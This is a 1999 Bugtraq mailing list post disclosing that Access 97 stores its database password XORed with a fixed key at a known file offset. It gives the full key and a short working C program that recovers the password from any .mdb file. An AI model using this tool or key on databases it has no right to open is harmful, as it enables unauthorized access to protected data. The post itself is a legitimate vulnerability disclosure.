Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Microsoft Access 97 Stores Database Password as Plaintext

From: jim () JTAN COM (Jim Paris)
Date: Tue, 9 Feb 1999 17:46:27 -0500


The following text was posted to USENET, and indexed on a Russian cypherpunk
site.  I found it when I was doing some work with Access 97 databses.  I
think you will agree that this particular "feature" makes the linked
database password issue moot.


Most definately!


  Anyway, Access97 passwords are stored in the 13 bytes from offset
0x42 in a .mdb file.  Do a bitwise XOR with 0x86, 0xFB, 0xEC, 0x37,
0x5D, 0x44, 0x9C, 0xFA, 0xC6, 0x5E, 0x28, 0xE6, 0x13 to recover the
plaintext.  I think that if the first byte is 0x86, the password is
not checked.


Minor correction: the passwords can be a maximum of 14 bytes.  The last
XOR value is 0xD8.  Here's a quick program to test this lack of
security:

/* snip here */

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
        FILE *mdb; int i; char ch;
        int secret[14]={
                0x86,0xFB,0xEC,0x37,
                0x5D,0x44,0x9C,0xFA,
                0xC6,0x5E,0x28,0xE6,
                0x13,0xD8
        };

        if(argc<2) {
                fprintf(stderr,"usage: %s filename.mdb\n",argv[0]);
                return 1;
        }

        if((mdb=fopen(argv[1],"rb"))==NULL) {
                fprintf(stderr,"%s: can't open %s\n",argv[0],argv[1]);
                return 1;
        }

        fseek(mdb,0x42,SEEK_SET);
        
        printf("The password is: ");
        for(i=0;i<14;i++)
        {
                if((ch=fgetc(mdb)^secret[i])==0) break;
                putchar(ch);
        }
        if(i==0) printf("(none)");
        putchar('\n');

        fclose(mdb);
        return 0;
}

/* snip here */

-jim
Previous By Date Next
Previous By Thread Next

Current thread: